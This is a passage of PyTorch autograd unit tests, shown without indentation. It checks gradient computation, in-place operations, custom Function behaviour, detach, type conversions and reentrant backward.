b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need its inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is the output of the in-place add_, so backward through it should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should still be usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
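# Only `a` is marked non-differentiable, so backward still receives a gradient
# slot for it, but it arrives as all zeros; grad_b carries the real gradient
# (ones, from b.sum()).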
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. Functions
# implemented in C++ expect incoming grad_outputs to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
def _test_setitem(self, size, index):
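# Assigning into y bumps its version counter and cuts the gradient at the
# overwritten positions: x.grad should be 1 everywhere except `index`, where
# it is 0.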
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case where x broadcasts to match y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
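# gather with sparse_grad=True should produce a sparse x.grad whose dense form
# matches the gradient obtained from the ordinary dense path.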
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# After raising the warning, it should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point in time, it complains that the graph has been freed
# (which is indeed true, although a somewhat indirect way of stating the
# problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything particularly interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
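# For a product over all elements, d(prod(x)) / dx_ij = prod(x) / x_ij, so the
# gradient is (grad_output * y) broadcast over the last two dims, divided by x.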
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# Prior to #22983, this test failed complaining that buffers had already
# been freed. It's also a pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
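# Since y == x ** 2 was saved in forward, 2 * y / x == 2 * x, so Double2
# computes the same gradient as Double while routing through the saved output.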
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
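# x.grad reflects only the first backward (d(x * 2)/dx == 2), while y.grad
# accumulates 1 from each of the two backward passes.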
# in-place detach on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def test_detach_then_inplace_raises_in_autograd(self):
x = torch.randn([], requires_grad=True)
orig_x = x.detach().clone()
y = x ** 2 # saves x
z = x.detach()
z.zero_()
with self.assertRaisesRegex(RuntimeError, "has been modified by an inplace"):
y.backward()
def test_detach_disallows_metadata_change(self):
x = torch.randn([], requires_grad=True)
detached = x.detach()
with self.assertRaisesRegex(
RuntimeError, "not allowed on a Tensor created from .data or .detach()"):
detached.resize_(3, 3)
def _test_type_conversion_backward(self, t, ):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
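# .cuda() on a tensor that is already on the GPU returns the same tensor,
# which is why the data_ptr comparison below holds in the y_cuda case.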
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
self.assertEqual(y.grad, torch.ones(5, 5))
self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
class Inplace(InplaceFunction):
@staticmethod
def forward(ctx, a, b):
ctx.mark_dirty(a)
return a.add_(b), b + 2
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a, grad_a + grad_b
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
q, p = Inplace.apply(x, y)
self.assertIs(q, x)
self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
self.assertTrue(q.requires_grad)
q.sum().backward()
self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
x = torch.randn(5, requires_grad=True)
y = torch.randn(5, requires_grad=True)
z = (x * y).sum()
with torch.no_grad():
x *= 2
self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
lambda: z.backward())
def test_no_grad_input(self):
class MyFunction(Function):
@staticmethod
def forward(self, x):
return x
@staticmethod
def backward(self, grad_output):
return grad_output
x = torch.randn(5, requires_grad=True)
with torch.no_grad():
y = MyFunction.apply(x)
self.assertTrue(x.requires_grad)
self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
# This test checks the backward engine for a very subtle bug that appeared
# in one of the initial versions of autograd. Gradient tensors were
# simply stored in lists while the function waited for all its gradients
# to be computed. However, sometimes an output was used multiple times,
# so the gradients needed to be summed. The engine used to keep a need_copy
# set of tensors that would need a clone upon the next addition and removed
# them from the set as soon as the clone was performed. However, this
# could lead to incorrect results if the same gradient tensor was
# buffered in three places in the graph:
# 1. When accumulating gradients in one of these places it was cloned
# and removed from the need_copy set.
# 2. When accumulating in the second place, it wasn't in the need_copy set,
# so the gradients were simply accumulated in-place (which already
# modified the grad in the 3rd place)
# 3. When accumulating in the third place, it wasn't in the need_copy set
# either, so the incoming gradient was summed in-place, yielding
# incorrect results in all functions except the first one.
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5, requires_grad=True)
# Simulate that we're in the middle of the graph
a = x + 2
b = y + 2
c = x + 2
# This op will just return grad_output two times in backward
add1 = a + b
add2 = add1 + c
# Simulate a long branch, so grad_output will get buffered.
for _ in range(4):
a = a * 2
b = b * 2
c = c * 2
branch = a + b + c
out = add2 + branch
# expected gradients are:
# for x: 34 (16 from final a, 16 from final c, 2 from add2)
# for y: 17 (16 from final b, 1 from add2)
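# Each `* 2` in the loop doubles the gradient flowing through that branch, so the
# final a, b and c each contribute a factor of 2**4 == 16 via `branch`, while add2
# contributes 1 per use (through a and c for x, and through b for y).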
grad_output = torch.ones(5, 5)
out.backward(grad_output)
self.assertEqual(x.grad, torch.ones(5, 5) * 34)
self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
test_case = self
class MyFn(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(None, input, None)
return input * input
@staticmethod
def backward(ctx, grad_output):
n1, input, n2 = ctx.saved_tensors
test_case.assertIsNone(n1)
test_case.assertIsNone(n2)
return 2 * input * grad_output
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
class MyFn(Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None, None
x = torch.randn(5, 5, requires_grad=True)
y = MyFn.apply(x)
y.sum().backward()
self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
class F1(Function):
@staticmethod
def forward(ctx, input):
out = torch.randn(input.size())
ctx.mark_non_differentiable(out)
return input, out
@staticmethod
def backward(ctx, grad_output, ignored):
return grad_output
class F2(Function):
@staticmethod
def forward(ctx, input, ignored):
return input
@staticmethod
def backward(ctx, grad_output):
return grad_output, None
x = torch.randn(5, requires_grad=True)
a, b = F1.apply(x)
b = b + 1 # separate F1 from F2 by another op
self.assertTrue(a.requires_grad)
self.assertFalse(b.requires_grad)
c = F2.apply(a, b)
c.backward(torch.ones(c.size()))
self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
y_data = torch.randn(2, 2)
class Reenter(Function):
@staticmethod
def forward(ctx, x):
with torch.enable_grad():
ctx.x = Variable(x, requires_grad=True)
ctx.y = Variable(y_data, requires_grad=True)
ctx.output_var = ctx.x * ctx.y
return ctx.output_var.detach()
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
ctx.output_var.sum().backward()
return ctx.x.grad * grad_output
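# Calling backward() here re-enters the autograd engine from inside a backward
# pass; d(x * y)/dx == y, so ctx.x.grad equals y_data and the outer x.grad below
# ends up equal to y_data.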
# Reentrant starts on CPU thread, finishes on GPU thread
x = torch.randn(2, 2, requires_grad=True)
out = Reenter.apply(x)
out.sum().backward()
self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
# Parent graph.
a = torch.rand(3, 3, requires_grad=True)
c = a * a
# Reentrant child graph.
b = torch.rand(3, 3, requires_grad=True)
e = b * b
f = TestAutograd.SimulateBackwardError.apply(e)
reentrant_root = f.sum()
class ReentrantFunc(Function):
@staticmethod
def forward(ctx, inp):
return inp.clone()
@staticmethod
def backward(ctx, grad):
# Reentrant backward in child will throw an error.
reentrant_root.backward()
return grad
d = ReentrantFunc.apply(c)
with self.assertRaisesRegex(Exception, 'Simulate error'):
d.sum().backward()
def test_var_mean_differentiable(self):
dim = [2, 4]
keepdim = False
input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
input2 = deepcopy(input1)
var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
var2 = input2.var(dim=dim, keepdim=keepdim)
mean2 = input2.mean(dim=dim, keepdim=keepdim)
grad = torch.randn(3, 4, 6, 3, requires_grad=True)
r1 = var1 * var1 * mean1 * mean1
r2 = var2 * var2 * mean2 * mean2
self.assertEqual(r1, r2, rtol=0.01, atol=0.0)
torch.autograd.backward(r1, grad)
torch.autograd.backward(r2, grad)
self.assertEqual(input1.grad, input2.grad, rtol=0.01, atol=0.0)
@skipIfNoLapack
def test_lobpcg(self):
def func(k, A, largest=True, B=None):
X_shape = list(A.shape)
X_shape[-1] = k
X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
if A.dim() > 2:
X = X.expand(X_shape)
D, U = torch.lobpcg(A=A, k=k, B=B, X=X, largest=largest)
# LOBPCG uses a random initial eigenspace approximation
# if parameter `X` is not provided.
# This may cause non-deterministic behavior
# when it comes to the sign of an eigenvector
# (note that if v is an eigenvector, so is -v),
# hence we eliminate this non-determinism
# by making sure that each column of U
# gets multiplied by the sign of its max (in absolute value) element.
# Also, gradcheck changes the content of the input by +/- eps (defaults to 1e-06)
# to compute the numerical gradient, which can also cause the signs to flip.
_, idx = U.abs().max(-2, keepdim=True)
sign = U.gather(-2, idx).sign()
U = U * sign
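# idx holds, per eigenvector column, the row index of the largest-magnitude entry;
# multiplying by that entry's sign flips columns whose dominant element is negative,
# making the eigenvector signs deterministic.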
return D, U
# TODO: review if this can be ported to OpInfos or moved to test_linalg.py
def run_symeig_test(k, sizes, largest=True):
A = torch.rand(*sizes).double()
A = (A @ A.mT) / 10
A.requires_grad_(True)
gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
# Custom gradient vectors for better stability due to some
# non-determinism in lobpcg's forward.
# Note this is not required if symeig is used in the forward instead (tested).
D_grad = torch.rand(*A.shape[:-2], k) / 100
U_grad = torch.rand(*A.shape[:-1], k) / 100
